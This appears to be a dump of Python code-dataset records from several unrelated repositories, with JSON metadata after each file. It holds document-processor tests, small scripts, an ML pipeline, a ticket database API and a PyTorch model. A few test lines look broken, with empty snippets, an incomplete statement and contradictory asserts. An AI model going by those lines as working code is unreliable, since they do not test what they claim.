output\n\n def test_args(self):\n # we can add create argparse-arguments from `args`\n parser = ArgumentParser()\n for arg in OOConvProcessor.args:\n parser.add_argument(\n arg.short_name, arg.long_name, **arg.keywords)\n result = vars(parser.parse_args([]))\n # defaults\n assert result == {'oocp_output_format': 'html',\n 'oocp_pdf_version': False,\n 'oocp_pdf_tagged': False,\n 'oocp_hostname': 'localhost',\n 'oocp_port': 2002,\n }\n # explicitly set value (different from default)\n result = vars(parser.parse_args(['-oocp-out-fmt', 'pdf',\n '-oocp-pdf-version', '1',\n '-oocp-pdf-tagged', '1',\n '-oocp-host', 'example.com',\n '-oocp-port', '1234', ]))\n assert result == {'oocp_output_format': 'pdf',\n 'oocp_pdf_version': True,\n 'oocp_pdf_tagged': True,\n 'oocp_hostname': 'example.com',\n 'oocp_port': 1234}\n\n\nclass TestUnzipProcessor(object):\n\n def test_simple(self, workdir, samples_dir):\n proc = UnzipProcessor()\n resultpath, metadata = proc.process(\n str(samples_dir / \"sample2.zip\"), {})\n assert resultpath.endswith('simple.txt')\n\n def test_one_file_only(self, workdir, samples_dir):\n # if a zip file contains more than one file, that's an error\n proc = UnzipProcessor()\n result_path, metadata = proc.process(\n str(samples_dir / \"sample1.zip\"), {'error': False})\n assert metadata['error'] is True\n assert result_path is None\n\n def test_unsupported_extension(self, workdir):\n # if the given file has unsupported filenames extension,\n # it is returned unchanged.\n proc = UnzipProcessor()\n input_path = str(workdir / \"src\" / \"sample.txt\")\n result_path, metadata = proc.process(input_path, {'error': False})\n assert metadata['error'] is False\n assert result_path == input_path\n\n def test_args(self):\n # we can add create argparse-arguments from `args`\n parser = ArgumentParser()\n for arg in UnzipProcessor.args:\n parser.add_argument(\n arg.short_name, arg.long_name, **arg.keywords)\n result = vars(parser.parse_args([]))\n # defaults\n assert result == {}\n # explicitly set value (different from default)\n result = vars(parser.parse_args([]))\n 
assert result == {}\n\n\nclass TestZipProcessor(object):\n\n def test_simple(self, workdir):\n sample_path = str(workdir / \"src\" / \"sample.txt\")\n proc = ZipProcessor()\n result_path, metadata = proc.process(\n sample_path, {'error': False})\n assert zipfile.is_zipfile(result_path)\n zip_file = zipfile.ZipFile(result_path, 'r')\n assert zip_file.namelist() == ['sample.txt', ]\n\n def test_store_several_files(self, workdir):\n # Zip processor is able to store several files in a ZIP file.\n sample_path = str(workdir / \"src\" / \"sample.txt\")\n workdir.join(\"src\").join(\"othersample.txt\").write(\"Hi there\")\n proc = ZipProcessor()\n result_path, metadata = proc.process(\n sample_path, {'error': False})\n assert zipfile.is_zipfile(result_path)\n zip_file = zipfile.ZipFile(result_path, 'r')\n namelist = zip_file.namelist()\n assert sorted(namelist) == ['othersample.txt', 'sample.txt']\n\n def test_args(self):\n # we can add create argparse-arguments from `args`\n parser = ArgumentParser()\n for arg in ZipProcessor.args:\n parser.add_argument(\n arg.short_name, arg.long_name, **arg.keywords)\n result = vars(parser.parse_args([]))\n # defaults\n assert result == {}\n # explicitly set value (different from default)\n result = vars(parser.parse_args([]))\n assert result == {}\n\n\nclass TestTidyProcessor(object):\n\n def test_default_xhtml(self, workdir, samples_dir):\n # make sure by default we get XHTML output from HTML.\n samples_dir.join(\"sample1.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = Tidy()\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n contents = open(resultpath, 'rb').read()\n assert b'xmlns=\"http://www.w3.org/1999/xhtml\"' in contents\n\n def test_encoding_utf8(self, workdir, samples_dir):\n # make sure we get UTF-8 output and no special stuff.\n samples_dir.join(\"sample1.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = Tidy()\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n contents = codecs.open(resultpath, 'r', encoding='utf-8').read()\n assert u'Ü' in contents\n assert u'Ü' not in contents\n\n def test_non_html_ignored(self, workdir):\n # we do not try to tidy non html/xhtml files\n proc = Tidy()\n sample_path = workdir / \"sample.txt\"\n sample_path.write('Sample file.')\n resultpath, metadata = proc.process(\n str(sample_path), {'error': False})\n # the document path hasn't changed\n assert resultpath == str(sample_path)\n\n def test_args(self):\n # we can add create argparse-arguments from `args`\n parser = ArgumentParser()\n for arg in Tidy.args:\n parser.add_argument(\n arg.short_name, arg.long_name, **arg.keywords)\n result = vars(parser.parse_args([]))\n # defaults\n assert result == {}\n # explicitly set value (different from default)\n result = vars(parser.parse_args([]))\n assert result == {}\n\n\nclass TestCSSCleanerProcessor(object):\n\n def test_cleaner(self, workdir, samples_dir):\n # make sure we get a new CSS file and a link to it in HTML\n samples_dir.join(\"sample2.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = CSSCleaner()\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n contents = codecs.open(resultpath, 'r', encoding='utf-8').read()\n snippet = u\"%s\" % (\n '')\n assert u'sample.css' in os.listdir(os.path.dirname(resultpath))\n assert snippet in contents\n assert u'With umlaut: ä' in contents\n\n def test_cleaner_css_correct_css(self, workdir, 
samples_dir):\n # make sure we get a new CSS file and a link to it in HTML\n samples_dir.join(\"sample2.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = CSSCleaner()\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n resultdir = os.path.dirname(resultpath)\n result_css = codecs.open(\n os.path.join(resultdir, 'sample.css'), 'r', 'utf-8').read()\n assert 'font-family: ;' not in result_css\n\n def test_cleaner_css_minified(self, workdir, samples_dir):\n # make sure we can get minified CSS if we wish so.\n samples_dir.join(\"sample2.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = CSSCleaner(options={'css_cleaner.minified': '1'})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n resultdir = os.path.dirname(resultpath)\n result_css = codecs.open(\n os.path.join(resultdir, 'sample.css'), 'r', 'utf-8').read()\n assert 'p{margin-bottom:.21cm}span.c2' in result_css\n\n def test_cleaner_css_non_minified(self, workdir, samples_dir):\n # make sure we can get non-minified CSS if we wish so.\n samples_dir.join(\"sample2.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = CSSCleaner(options={'css-cleaner-min': '0'})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n resultdir = os.path.dirname(resultpath)\n result_css = codecs.open(\n os.path.join(resultdir, 'sample.css'), 'r', 'utf-8').read()\n assert 'p {\\n margin-bottom: 0.21cm\\n }\\n' in result_css\n\n def test_cleaner_css_default_minified(self, workdir, samples_dir):\n # make sure we can get non-minified CSS if we wish so.\n samples_dir.join(\"sample2.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = CSSCleaner()\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n resultdir = os.path.dirname(resultpath)\n result_css = codecs.open(\n os.path.join(resultdir, 'sample.css'), 'r', 'utf-8').read()\n assert 'p{margin-bottom:.21cm}' in result_css\n\n def test_cleaner_invalid_minified(self):\n # The minified option must be true or false\n with pytest.raises(ArgumentParserError):\n CSSCleaner(options={'css-cleaner-min': 'nonsense'})\n\n def test_cleaner_prettify(self, workdir, samples_dir):\n # we can get prettified HTML from CSS cleaner\n # This might result in gaps in rendered output.\n samples_dir.join(\"sample2.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = CSSCleaner(options={'css-cleaner-prettify': '1'})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n with codecs.open(resultpath, 'r', 'utf-8') as fd:\n result_html = fd.read()\n assert 'seam\\n \\n \\n less' in result_html\n\n def test_cleaner_non_prettify(self, workdir, samples_dir):\n # we can get non-prettified HTML from CSS cleaner\n samples_dir.join(\"sample2.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = CSSCleaner(options={'css-cleaner-prettify': '0'})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False}, )\n with codecs.open(resultpath, 'r', 'utf-8') as fd:\n result_html = fd.read()\n assert 'seamless text.' 
in result_html\n\n    def test_cleaner_non_prettify_is_default(self, workdir, samples_dir):\n        # we get non-prettified HTML from CSS cleaner by default\n        samples_dir.join(\"sample2.html\").copy(workdir / \"src\" / \"sample.html\")\n        proc = CSSCleaner()\n        resultpath, metadata = proc.process(\n            str(workdir / \"src\" / \"sample.html\"), {'error': False}, )\n        with codecs.open(resultpath, 'r', 'utf-8') as fd:\n            result_html = fd.read()\n        assert u'seamless text.' in result_html\n\n    def test_non_html_ignored(self, workdir):\n        # Non .html/.xhtml files are ignored\n        proc = CSSCleaner()\n        sample_path = workdir / \"src\" / \"sample.txt\"\n        sample_path.write(\"Sample file.\")\n        resultpath, metadata = proc.process(str(sample_path), {'error': False})\n        # input was not touched\n        assert resultpath == str(sample_path)\n\n    def test_args(self):\n        # we can create argparse-arguments from `args`\n        parser = ArgumentParser()\n        for arg in CSSCleaner.args:\n            parser.add_argument(\n                arg.short_name, arg.long_name, **arg.keywords)\n        result = vars(parser.parse_args([]))\n        # defaults\n        assert result == {\n            'css_cleaner_minified': True,\n            'css_cleaner_prettify_html': False,\n            }\n        # explicitly set value (different from default)\n        result = vars(parser.parse_args(\n            [\n                '-css-cleaner-min', 'no',\n                '-css-cleaner-prettify', 'yes',\n            ]))\n        assert result == {\n            'css_cleaner_minified': False,\n            'css_cleaner_prettify_html': True,\n            }\n\n    def test_spaces_preserved_by_default(self, workdir, samples_dir):\n        # we can be sure that any whitespaces are preserved (by default)\n        samples_dir.join(\n            \"sample-font-props.html\").copy(workdir / \"src\" / \"sample.html\")\n        proc = CSSCleaner()\n        resultpath, metadata = proc.process(\n            str(workdir / \"src\" / \"sample.html\"), {'error': False})\n        result_html = open(resultpath, 'r').read()\n        assert \" sub\" in result_html  # space before tag\n        assert \"subscript\" in result_html  # no space before tag\n        assert \"subscript\" in result_html  # no space after tag\n        assert \"script parts\" in result_html  # space after tag\n\n\nclass TestHTMLCleanerProcessor(object):\n\n    def test_cleaner(self, workdir, samples_dir):\n        # make sure erroneous headings are fixed by default.\n        samples_dir.join(\"sample3.html\").copy(workdir / \"src\" / \"sample.html\")\n        proc = HTMLCleaner()\n        resultpath, metadata = proc.process(\n            str(workdir / \"src\" / \"sample.html\"), {'error': False})\n        contents = codecs.open(resultpath, 'r', 'utf-8').read()\n        assert u'1Häding1' in contents\n        assert u'1.1Heading1.1' in contents\n        assert u'1.2.Heading1.2.' 
in contents\n\n def test_option_fix_head_nums_true(self, samples_dir, workdir):\n # Make sure we respect the `fix_head_nums` option if true\n samples_dir.join(\"sample3.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = HTMLCleaner(\n options={\n 'html-cleaner-fix-head-nums': '1'})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n contents = codecs.open(resultpath, 'r', 'utf-8').read()\n assert u'1Häding1' in contents\n\n def test_option_fix_head_nums_false(self, samples_dir, workdir):\n # Make sure we respect the `fix_head_nums` option if false.\n samples_dir.join(\"sample3.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = HTMLCleaner(\n options={\n 'html-cleaner-fix-head-nums': 'False'})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n contents = codecs.open(resultpath, 'r', 'utf-8').read()\n assert u'1Häding1' not in contents\n\n def test_option_fix_img_links_false(self, samples_dir, workdir):\n # Make sure we respect the `fix_head_nums` option if true\n samples_dir.join(\"image_sample.html\").copy(\n workdir / \"src\" / \"sample.html\")\n samples_dir.join(\"image_sample_html_m20918026.gif\").copy(\n workdir / \"src\" / \"image_sample_html_m20918026.gif\")\n proc = HTMLCleaner(\n options={\n 'html-cleaner-fix-img-links': '0'})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n contents = open(resultpath, 'r').read()\n resultdir = os.path.dirname(resultpath)\n snippet = '' in contents\n\n def test_option_fix_sdfields_true(self, samples_dir, workdir):\n # Make sure we respect the `fix_sdtags` option if false\n samples_dir.join(\"sample3.html\").copy(workdir / \"src\" / \"sample.html\")\n proc = HTMLCleaner(\n options={\n 'html-cleaner-fix-sd-fields': '1'})\n resultpath, metadata = proc.process(\n str(workdir / \"src\" / \"sample.html\"), {'error': False})\n contents = codecs.open(resultpath, 'r', 'utf-8').read()\n assert u'' not in contents\n\n def test_option_invalid(self):\n # Make sure we complain when trash is set as `fix_head_nums`.\n with pytest.raises(ArgumentParserError):\n HTMLCleaner(options={'html-cleaner-fix-head-nums': 'foo'})\n with pytest.raises(ArgumentParserError):\n HTMLCleaner(options={'html-cleaner-fix-img-links': 'foo'})\n with pytest.raises(ArgumentParserError):\n HTMLCleaner(options={'html-cleaner-fix-sdfields': 'foo'})\n\n def test_rename_img_files(self, samples_dir, workdir):\n # we can rename image files\n samples_dir.join(\"image_sample_html_m20918026.gif\").copy(\n workdir / \"src\" / \"image_sample_html_m20918026.gif\")\n proc = HTMLCleaner(\n options={'html-cleaner-fix-img-links': '1'})\n proc.rename_img_files(\n str(workdir / \"src\"),\n {'image_sample_html_m20918026.gif': 'sample_1.gif'}\n )\n list_dir = os.listdir(str(workdir / \"src\"))\n assert 'sample_1.gif' in list_dir\n assert 'image_sample_html_m20918026.gif' not in list_dir\n\n def test_rename_img_files_no_src(self, samples_dir, workdir):\n # We cope with not existing source files\n samples_dir.join(\"image_sample_html_m20918026.gif\").copy(\n workdir / \"src\" / \"image_sample_html_m20918026.gif\")\n proc = HTMLCleaner(\n options={'html-cleaner-fix-img-links': '1'})\n proc.rename_img_files(\n str(workdir / \"src\"),\n {'not-existing-filename': 'sample_1.gif'}\n )\n list_dir = os.listdir(str(workdir / \"src\"))\n assert 'sample_1.gif' not in list_dir\n\n def test_rename_img_files_dst_exists_already(self, samples_dir, 
workdir):\n # We cope with dest files that already exist\n samples_dir.join(\"image_sample_html_m20918026.gif\").copy(\n workdir / \"src\" / \"image_sample_html_m20918026.gif\")\n proc = HTMLCleaner(\n options={'html-cleaner-fix-img-links': '1'})\n proc.rename_img_files(\n str(workdir / \"src\"),\n {\n 'image_sample_html_m20918026.gif':\n 'image_sample_html_m20918026.gif'\n }\n )\n list_dir = os.listdir(str(workdir / \"src\"))\n assert 'image_sample_html_m20918026.gif' in list_dir\n\n def test_rename_img_files_src_is_dir(self, workdir):\n # We cope with src files that are in fact dirs\n proc = HTMLCleaner(\n options={'html-cleaner-fix-img-links': '1'})\n proc.rename_img_files(\n str(workdir), {'src': 'sample.jpg'})\n list_dir = os.listdir(str(workdir))\n assert 'sample.jpg' not in list_dir\n\n def test_non_html_ignored(self, workdir):\n # Non .html/.xhtml files are ignored\n proc = HTMLCleaner()\n sample_path = workdir / \"src\" / \"sample.txt\"\n resultpath, metadata = proc.process(\n str(sample_path), {'error': False})\n # input was not touched\n assert resultpath == str(sample_path)\n\n def test_args(self):\n # we can add create argparse-arguments from `args`\n parser = ArgumentParser()\n for arg in HTMLCleaner.args:\n parser.add_argument(\n arg.short_name, arg.long_name, **arg.keywords)\n result = vars(parser.parse_args([]))\n # defaults\n assert result == {\n 'html_cleaner_fix_heading_numbers': True,\n 'html_cleaner_fix_image_links': True,\n 'html_cleaner_fix_sd_fields': True}\n # explicitly set value (different from default)\n result = vars(parser.parse_args([\n '-html-cleaner-fix-head-nums', '0',\n '-html-cleaner-fix-img-links', 'false',\n '-html-cleaner-fix-sd-fields', 'No']))\n assert result == {\n 'html_cleaner_fix_heading_numbers': False,\n 'html_cleaner_fix_image_links': False,\n 'html_cleaner_fix_sd_fields': False}\n\n\nclass TestErrorProcessor(object):\n\n def test_error(self):\n proc = Error()\n path, metadata = proc.process(None, {})\n assert path is None\n assert 'error-descr' in metadata.keys()\n","repo_name":"ulif/ulif.openoffice","sub_path":"tests/test_processor.py","file_name":"test_processor.py","file_ext":"py","file_size_in_byte":37165,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"31043251833","text":"from datetime import datetime\n\nfecha_nacimiento = input(\"Introduzca su fecha de nacimiento (dd/mm/aaaa): \")\nf_nac = datetime.strptime(fecha_nacimiento, \"%d/%m/%Y\")\nf_actual = datetime.now()\ndelta = f_actual - f_nac\nedad = delta.days // 365\nif edad >= 18:\n print(\"Usted es mayor de edad\")\nelse:\n print(\"Usted es menor de edad\")","repo_name":"jairochapela/rosetta","sub_path":"05-mayoria-de-edad/python/mayordeedad.py","file_name":"mayordeedad.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33062317420","text":"import os\ndef read_file(filename):\n\tlines = []\n\twith open(filename, 'r', encoding='utf-8') as f:\n\t\tfor line in f:\n\t\t\tlines.append(line.strip())\n\treturn lines\n\ndef convert(lines):\n\tnew = []\n\tperson = None\n\tfor line in lines:\n\t\tif line == 'Allen': #一個小系列\n\t\t\tperson = 'Allen'\n\t\t\tcontinue\n\t\telif line == 'Tom': #一個小系列\n\t\t\tperson = 'Tom'\n\t\t\tcontinue\n\t\tif person:\n\t\t\tnew.append(person + ':' + line)\n\treturn new\n\ndef write_file(filename, lines):\n\twith open(filename, 'w') as f:\n\t\tfor line in lines:\n\t\t\tf.write(line + '\\n')\n\ndef 
main():\n\tif os.path.isfile('conversation.txt'):\n\t\tprint('找到檔案!')\n\telse:\n\t\tprint('無法讀取檔案')\n\t\treturn\n\tlines = read_file('conversation.txt')\n\tlines = convert(lines)\n\twrite_file('outcome.txt', lines) #輸出檔名\n\nmain()","repo_name":"NicholasChen2170/conversation_practice","sub_path":"conversation_practice.py","file_name":"conversation_practice.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"23351261458","text":"import pandas as pd\nfrom sklearn.model_selection import KFold, cross_val_score\nfrom sklearn.ensemble import GradientBoostingClassifier\nimport datetime\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.linear_model import LogisticRegression\nimport numpy as np\n\n# Подход 1: градиентный бустинг \"в лоб\"\n\n# 1. Считайте таблицу с признаками из файла features.csv\n# Удалите признаки, связанные с итогами матча (они помечены в описании данных как отсутствующие в тестовой выборке)\ntrain = pd.read_csv(\"data/final/features.csv\", index_col=\"match_id\")\ntrain.drop([\n    \"duration\",\n    \"tower_status_radiant\",\n    \"tower_status_dire\",\n    \"barracks_status_radiant\",\n    \"barracks_status_dire\",\n    ], axis=1, inplace=True)\n\n\n# 2. Проверьте выборку на наличие пропусков с помощью функции count(),\n# которая для каждого столбца показывает число заполненных значений.\n# Много ли пропусков в данных? Запишите названия признаков, имеющих пропуски,\n# и попробуйте для любых двух из них дать обоснование, почему их значения могут быть пропущены.\ncount_na = len(train) - train.count()\npasses = count_na[count_na > 0].sort_values(ascending=False) / len(train)\n\n\n# 3. Замените пропуски на нули с помощью функции fillna()\ntrain.fillna(0, inplace=True)\n\n\n# 4. Какой столбец содержит целевую переменную?\n# Запишите его название.\nX_train = train.drop(\"radiant_win\", axis=1)\ny_train = train[\"radiant_win\"]\n\n\n# Обучение градиентного бустинга над деревьями на имеющейся матрице \"объекты-признаки\"\ncv = KFold(n_splits=5, shuffle=True, random_state=42)\n\n\ndef score_gb(X: pd.DataFrame, y: pd.Series) -> pd.Series:\n    scores = {}\n\n    for n_estimators in [10, 20, 30, 50, 100, 250]:\n        print(f\"n_estimators={n_estimators}\")\n        model = GradientBoostingClassifier(n_estimators=n_estimators, random_state=42)\n\n        start_time = datetime.datetime.now()\n        score = cross_val_score(model, X, y, cv=cv, scoring=\"roc_auc\", n_jobs=-1).mean()\n        print(f\"Score: {score:.3f}\")\n        print(f\"Time elapsed: {datetime.datetime.now() - start_time}\")\n\n        scores[n_estimators] = score\n        print()\n\n    return pd.Series(scores)\n\n\n# scores = score_gb(X_train, y_train)\n\n\n# Подход 2: логистическая регрессия\n\n# 1. 
Оцените качество логистической регрессии (sklearn.linear_model.LogisticRegression с L2-регуляризацией)\n# с помощью кросс-валидации по той же схеме, которая использовалась для градиентного бустинга\n\nscaler = StandardScaler()\nX_train = pd.DataFrame(scaler.fit_transform(X_train), index=X_train.index, columns=X_train.columns)\n\n\ndef score_lr(X: pd.DataFrame, y: pd.Series) -> pd.Series:\n scores = {}\n\n for i in range(-5, 6):\n C = 10.0 ** i\n\n print(f\"C={C}\")\n model = LogisticRegression(solver='lbfgs', C=C, random_state=42)\n\n start_time = datetime.datetime.now()\n score = cross_val_score(model, X, y, cv=cv, scoring=\"roc_auc\", n_jobs=-1).mean()\n print(f\"Score: {score:.3f}\")\n print(f\"Time elapsed: {datetime.datetime.now() - start_time}\")\n\n scores[i] = score\n print()\n\n return pd.Series(scores)\n\n\nscores = score_lr(X_train, y_train)\n\n\ndef print_best_lr_score(scores: pd.Series):\n best_iteration = scores.sort_values(ascending=False).head(1)\n best_C = 10.0 ** best_iteration.index[0]\n best_score = best_iteration.values[0]\n\n print(f\"Наилучшее значение показателя AUC-ROC достигается при C = {best_C:.2f} и равно {best_score:.2f}.\")\n\n\nprint_best_lr_score(scores)\n\n\n# 2. Среди признаков в выборке есть категориальные,\n# которые мы использовали как числовые, что вряд ли является хорошей идеей\n\nhero_columns = [f\"r{i}_hero\" for i in range (1, 6)] + [f\"d{i}_hero\" for i in range (1, 6)]\ncat_columns = [\"lobby_type\"] + hero_columns\nX_train.drop(cat_columns, axis=1, inplace=True)\n\nscores = score_lr(X_train, y_train)\nprint_best_lr_score(scores)\n\n\n# 3. На предыдущем шаге мы исключили из выборки признаки rM_hero и dM_hero, которые показывают,\n# какие именно герои играли за каждую команду\n\nunique_heroes = np.unique(train[hero_columns].values.ravel())\nN = max(unique_heroes)\nprint(f\"Число уникальных героев в train: {len(unique_heroes)}. Максимальный ID героя: {N}.\")\n\n\n# 4. Воспользуемся подходом \"мешок слов\" для кодирования информации о героях\ndef get_pick(data: pd.DataFrame) -> pd.DataFrame:\n X_pick = np.zeros((data.shape[0], N))\n\n for i, match_id in enumerate(data.index):\n for p in range(1, 6):\n X_pick[i, data.loc[match_id, f\"r{p}_hero\"] - 1] = 1\n X_pick[i, data.loc[match_id, f\"d{p}_hero\"] - 1] = -1\n\n return pd.DataFrame(X_pick, index=data.index, columns=[f\"hero_{i}\" for i in range(N)])\n\n\nX_pick = get_pick(train)\nX_train = pd.concat([X_train, X_pick], axis=1)\n\n# 5. Проведите кросс-валидацию для логистической регрессии на новой выборке\n# с подбором лучшего параметра регуляризации\n\nscores = score_lr(X_train, y_train)\nprint_best_lr_score(scores)\n\n\n# 6. 
Постройте предсказания вероятностей победы команды Radiant для тестовой выборки\n# с помощью лучшей из изученных моделей (лучшей с точки зрения AUC-ROC на кросс-валидации)\n\nmodel = LogisticRegression(solver='lbfgs', C=0.1, random_state=42)\nmodel.fit(X_train, y_train)\n\ntest = pd.read_csv(\"data/final/features_test.csv\", index_col=\"match_id\")\ntest.fillna(0, inplace=True)\n\nX_test = pd.DataFrame(scaler.transform(test), index=test.index, columns=test.columns)\nX_test.drop(cat_columns, axis=1, inplace=True)\nX_test = pd.concat([X_test, get_pick(test)], axis=1)\n\npreds = pd.Series(model.predict_proba(X_test)[:, 1])\nprint(preds.describe())\n","repo_name":"Rom4e6/Machine-Learning-Yandex-intro","sub_path":"Machine Learning Yandex intro/Week_7/Others/Final_statement.py","file_name":"Final_statement.py","file_ext":"py","file_size_in_byte":6834,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"29416291570","text":"import datetime\nimport Api.Main_Api as main_api\n\n\nclass Admin_Api(main_api.Api):\n\n def __init__(self):\n super().__init__()\n self.connector()\n\n def add_new_item(self, json_data):\n # Get Film_ID from json_data\n film_id = json_data[\"Film_ID\"]\n # Get ticket information from Film_ID in the collection\n ticket = self.warehouse_collection.find_one({'Film_ID': film_id})\n if ticket is None:\n # Check if the information in json_data is complete or not\n S = 0\n for key, value in json_data.items():\n if self.warehouse_collection.find_one({key: value}) is None:\n S += 1\n else:\n continue\n if S == 6: # (Film_ID, Film, Genre, Showtime, Price)\n # If all 6 pieces of information are available, add a new ticket to the database\n self.warehouse_collection.insert_one(json_data)\n return 0 # Success\n else:\n # Error: missing information\n return -1\n else:\n # Update the number of tickets in the database\n current_quantity = ticket[\"Stock\"]\n if current_quantity < 30:\n new_quantity = current_quantity + json_data[\"Stock\"]\n self.warehouse_collection.update_one(\n {'Film_ID': film_id}, {'$set': {'Stock': new_quantity}})\n return 0 # Success\n else:\n # Error: ticket quantity is full\n return -2\n\n def update_items(self, json_data, film_id):\n # Get ticket information from json_data\n ticket = self.warehouse_collection.find_one({'Film_ID': film_id})\n _id = ticket['_id'] # Get the ID of the ticket\n if 'Film_ID' in json_data:\n if self.warehouse_collection.find_one({'Film_ID': json_data['Film_ID']}) is not None:\n return -2 # Error: Film_ID already exists in the database\n updated_fields = {}\n if 'Showtime' in json_data:\n try:\n datetime.datetime.strptime(json_data['Showtime'], \"%Y/%m/%d\")\n updated_fields['Showtime'] = json_data['Showtime']\n except ValueError:\n return -3 # Error: Showtime format is incorrect\n if 'Film' in json_data:\n updated_fields['Film'] = json_data['Film']\n if 'Genre' in json_data:\n updated_fields['Genre'] = json_data['Genre']\n # Update the ticket information in the database\n if updated_fields:\n self.warehouse_collection.update_one({'Film_ID': film_id}, {'$set': updated_fields})\n return 0 # Update successful\n else:\n # No new information was updated\n return -1\n\n def remove_items(self, film_id):\n # Get ticket information from json_data\n ticket = self.warehouse_collection.find_one({'Film_ID': film_id})\n if ticket is None:\n # Error: ticket not found\n return -2\n elif ticket is not None:\n film_id = ticket['Film_ID'] # get id of ticket\n 
self.warehouse_collection.delete_one({'Film_ID': film_id})\n            return 0 # success\n","repo_name":"thanhtyzz/group2","sub_path":"Api/Admin_Api.py","file_name":"Admin_Api.py","file_ext":"py","file_size_in_byte":3251,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
{"seq_id":"11011862870","text":"import torch \nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport model.CRUCell as CRUCell\n\nclass _CRU(nn.Module):\n    \n    def __init__(self, in_dim, hid_dim, out_dim, num_layers, bias = True):\n        super(_CRU, self).__init__()\n        \n        self.in_dim = in_dim\n        self.hid_dim = hid_dim\n        self.num_layers = num_layers\n        self.bias = bias\n        self.out_dim = out_dim\n        \n        self.cell_list = nn.ModuleList()\n        self.cell_list.append(CRUCell._CRUCell(self.in_dim,\n                                               self.hid_dim, \n                                               self.bias))\n        for l in range(1, self.num_layers):\n            self.cell_list.append(CRUCell._CRUCell(self.hid_dim,\n                                                   self.hid_dim,\n                                                   self.bias))\n\n        self.fc = nn.Sequential(\n            nn.Linear(self.hid_dim*self.num_layers, self.out_dim),\n            nn.ELU()\n        )\n\n        if torch.cuda.is_available():\n            self.device = torch.device('cuda')\n        else:\n            self.device = torch.device('cpu')\n        \n\n    def forward(self, input, hid_state=None):\n\n        if hid_state is None:\n            hid_state = Variable(torch.zeros(self.num_layers, 3, input.size(0), self.hid_dim)).to(self.device)\n        else:\n            hid_state = hid_state.to(self.device)\n\n        outs = []\n\n        hidden = list()\n        for layer in range(self.num_layers):\n            hidden.append(hid_state[layer,:, :, :])\n        \n        for t in range(input.size(1)):\n\n            for layer in range(self.num_layers):\n\n                if layer == 0:\n                    hid_layer = self.cell_list[layer](input[:, t, :], hidden[layer]).to(self.device)\n                else:\n                    hid_layer = self.cell_list[layer](hidden[layer - 1],hidden[layer]).to(self.device)\n                \n                hidden[layer] = hid_layer\n\n            outs.append(hid_layer)\n        \n        feature = torch.mean(outs[-1],axis=1)\n        out = torch.sum(outs[-1],axis=0)\n        out = self.fc(out)\n        \n        return out, feature","repo_name":"simsunghyun/CRU","sub_path":"model/CRU.py","file_name":"CRU.py","file_ext":"py","file_size_in_byte":2186,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"}
{"seq_id":"33342992019","text":"#!/usr/bin/python\n\"\"\"\nConfig getter module\n\"\"\"\nimport ConfigParser\nimport collections\nimport ast\n\ndef parse_dict(str_val):\n    \"\"\"Parses dict str from .ini file.\n    :str_val: str\n        '{'key1':'val1'}\\n{'key2':'val2'}'\n    :returns: dictionary\n        {'key1':'val1', 'key2':'val2'}\n    \"\"\"\n    elem_list = {}\n    current = {}\n    elements = str_val.split()\n    for elem in elements:\n        current = ast.literal_eval(elem)\n        key = current.keys()[0]\n        val = current.values()[0]\n        elem_list[key] = val\n    return elem_list\n\ndef parse_dict_arr(str_val):\n    \"\"\"Parses dict array str from .ini file.\n    :str_val: str\n        '{'key1':'val1'}\\n{'key2':'val2'}'\n    :returns: arr\n        contains dictionaries as follows\n        [{'key1':'val1'}, {'key2':'val2'}]\n    \"\"\"\n    elem_arr = []\n    elements = str_val.split()\n    for elem in elements:\n        elem_arr.append(ast.literal_eval(elem))\n    return elem_arr\n\nclass Fconfig(object):\n\n    \"\"\"Hard Coded Configuration Parser. 
